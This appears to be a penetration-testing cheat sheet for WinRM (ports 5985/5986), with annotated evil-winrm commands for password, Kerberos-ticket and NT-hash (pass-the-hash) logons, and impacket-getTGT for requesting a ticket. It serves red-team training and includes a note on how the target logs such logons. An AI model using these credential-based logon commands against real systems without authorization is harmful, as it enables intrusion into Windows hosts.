5985,5986 - WinRM (HTTP / HTTPS)

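# Password authentication. The password is passed in argv, so it ends up in
# shell history and is visible to anything that can read the process list.
evil-winrm -i IP -u USER -p "PASS"
# Kerberos authentication with an existing credential cache. evil-winrm's -k
# is --priv-key (private key for certificate auth), not a ticket path: the
# ticket is read from KRB5CCNAME, and -r REALM is what selects Kerberos.
# With Kerberos, -i has to be the host's FQDN and -u is not required.
KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i DC.DOMAIN -r DOMAIN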

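A veces se peta si no le indicas el DC y el dominio: con Kerberos (-r), -i tiene que ser el FQDN del host, no la IP, y el realm tiene que estar definido en /etc/krb5.conf.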

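# Kerberos with a ticket file: -k means --priv-key in evil-winrm, so the
# ccache is handed over through KRB5CCNAME instead. -r sets the realm, which
# must also be declared in /etc/krb5.conf; -i is the FQDN.
KRB5CCNAME=TICKET.ccache evil-winrm -i DC.DOMAIN -r DOMAIN
# The original line passed -i twice (IP and DC.DOMAIN); only one host can take
# effect, so keep the FQDN alone.
# NOTE(review): with -r set evil-winrm selects Kerberos, so -u/-p are
# presumably not what authenticates here; confirm against your version.
evil-winrm -i DC.DOMAIN -u USER -p "PASS" -r DOMAIN
# NT-hash authentication (NTLM). The target records this as a network logon
# (event 4624, logon type 3) with the NTLM authentication package.
evil-winrm -i IP -u USER -H 'NTHASH'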

Kerberos

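# Request a TGT; impacket saves it as USER.ccache in the current directory.
# The password is on the command line, so it lands in shell history and the
# process list. -dc-ip is documented as taking the DC's IP address; a hostname
# presumably only works when it resolves from this machine.
impacket-getTGT DOMAIN/'USER':'PASSWORD' -dc-ip DC.DOMAIN
# Point the Kerberos libraries at the ticket. An absolute path keeps it valid
# after a later cd.
export KRB5CCNAME="$PWD/USER.ccache"
# Kerberos logon using the exported ticket. -k is --priv-key in evil-winrm,
# not a ticket path, and the duplicated -i is reduced to the FQDN; -u/-p are
# dropped because the ticket is the credential.
evil-winrm -i DC.DOMAIN -r DOMAIN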